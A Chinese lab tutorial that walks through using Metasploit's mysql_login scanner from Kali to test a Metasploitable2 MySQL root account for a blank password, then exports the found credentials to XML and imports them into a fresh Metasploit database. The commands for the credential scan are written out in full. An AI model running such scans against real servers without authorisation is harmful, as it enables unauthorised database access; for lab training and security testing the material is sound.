使用msf 扫描靶机上的mysql服务的空密码

使用msf 扫描靶机上的mysql服务的空密码


实验环境

  • kali Linux 2019.1a
  • Metasploittable2- Linux

一、实验拓扑

image-20210214205028673

二、尝试破解MySQL的空密码

打开终端进入 msf 搜索模块并加载模块

msf5 > search mysql_login
msf5 > use auxiliary/scanner/mysql/mysql_login 

image-20210214205413094

查看配置选项并设置模块项

msf5 auxiliary(scanner/mysql/mysql_login) > show options
msf5 auxiliary(scanner/mysql/mysql_login) > set RHOSTS 192.168.37.140      //设置主机地址
msf5 auxiliary(scanner/mysql/mysql_login) > set USERNAME root							//爆破的用户
msf5 auxiliary(scanner/mysql/mysql_login) > set BLANK_PASSWORDS true       //为所有用户尝试空密码

image-20210214205810097

配置完成后运行,可以使用run 和exploit

msf5 auxiliary(scanner/mysql/mysql_login) > run 

image-20210214221632190

使用 后端凭证命令 creds ,列出数据库中的所有凭据

msf5 auxiliary(scanner/mysql/mysql_login) > creds

image-20210214221733404

三、将扫描的记过导出 Metasploit 与导入另一台机器的 Metasploit 中

3.1 将前面扫描的MySQL数据库空密码信息导出

msf5 auxiliary(scanner/mysql/mysql_login) > db_export -f xml /root/bak.xml

导出只支持两种格式:xml 和 pwdump

常用的导出格式为 xml

image-20210214222008145

导出后退出程序

msf5 auxiliary(scanner/mysql/mysql_login) > exit

为了演示效果 ,我们重置当前数据库,当成新的来用

root@fengzilin53:~# msfdb reinit 
root@fengzilin53:~# msfconsole 

image-20210214222303192

查看主机信息

msf5 > hosts

image-20210214222411372

数据库中主机信息是空的,我们导入数据

msf5 > db_import /root/bak.xml

image-20210214222605386

再次输入 hosts 发现导入成功

msf5 > hosts

image-20210214222732166

  • 3
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 2
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值